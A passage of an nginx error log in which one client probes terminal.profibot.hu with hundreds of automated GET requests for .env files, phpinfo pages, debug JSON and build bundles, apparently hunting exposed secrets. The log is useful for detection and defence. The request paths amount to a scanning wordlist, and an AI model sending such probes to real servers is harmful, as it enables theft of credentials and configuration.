/src/__tests__/__fixtures__/typeScriptIntegrationProject/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /src/__tests__/__fixtures__/typeScriptProject/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /src/__tests__/__fixtures__/typeScriptVisualizeProject/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /src/add-auth/express/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /src/assembly/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /src/character-service/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /src/client/mobile/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /src/core/tests/dotenv-files/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /src/gameprovider-service/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /src/main/front-end/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /src/main/resources/archetype-resources/__rootArtifactId__-acceptance-test/src/test/resources/app-launcher-tile/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /src/renderer/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /srv6_controller/controller/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /srv6_controller/examples/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /srv6_controller/node-manager/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /st-js-be-2020-movies-two/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /stack.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /stackato-pkg/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /stag/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /staging-api/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /staging/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /staging/api/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /staging/backend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /staging/frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static-collected/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static-html/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static-root/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static/js/*.chunk.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static/js/main.11bc02d8.chunk.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static/js/main.1b34ee2a.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static/js/main.335d17a0.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static/js/main.36e5ec99.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static/js/main.48389ac6.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static/js/main.4aa2819f.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static/js/main.602cea98.chunk.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static/js/main.87c766e3.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static/js/main.89c971fa.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:34 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static/js/main.8c18b542.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static/js/main.bfa51071.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static/js/main.ef8ecb99.chunk.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static_prod/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static_root/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /static_user/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /staticfiles/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /stats/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /storage/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /storage/.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /storage/debugbar/*.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /strapi/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /style/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /styles/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /stylesheets/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /swagger/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /symfony/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /system-config/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /system/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /system/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /system/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /target/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /temanr10/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /temanr9/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /temp.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /temp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /template/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /templates/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test-api/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test-network/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test-network/addOrg3/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:35 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/aries-js-worker/fixtures/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/adapter-rest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/agent-rest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/couchdb/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/demo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/demo/openapi/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/did-method-rest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/did-rest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/edv-rest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/openapi-demo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/sidetree-mock/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/universalresolver/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/vc-rest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/fixtures/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/fixtures/app_types/node/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/fixtures/app_types/rails/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/fixtures/node_path/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/integration/env-config/app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test0.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test1.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test123.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test2.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test3.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test4.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test5.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test6.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test7.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test8.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test9.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:36 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test_info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test_info1.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test_info2.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test_info3.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test_info4.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test_info5.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test_phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test_phpinfo1.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test_phpinfo2.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test_phpinfo3.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test_phpinfo4.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test_phpinfo5.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tester.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /testfiles/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /testing.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /testing/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /testing/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /testing/docker/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tests/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Tests/Application/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tests/default_settings/v10.0/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tests/default_settings/v11.0/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tests/default_settings/v12.0/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tests/default_settings/v13.0/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tests/default_settings/v7.0/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tests/default_settings/v8.0/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tests/default_settings/v9.0/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tests/drupal-test/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tests/Integration/Environment/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tests/todo-react/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /testwork_json/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:37 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /theme/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /theme_static/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /thumb/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /thumbs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tiedostot/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /time.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tmp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:38 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: 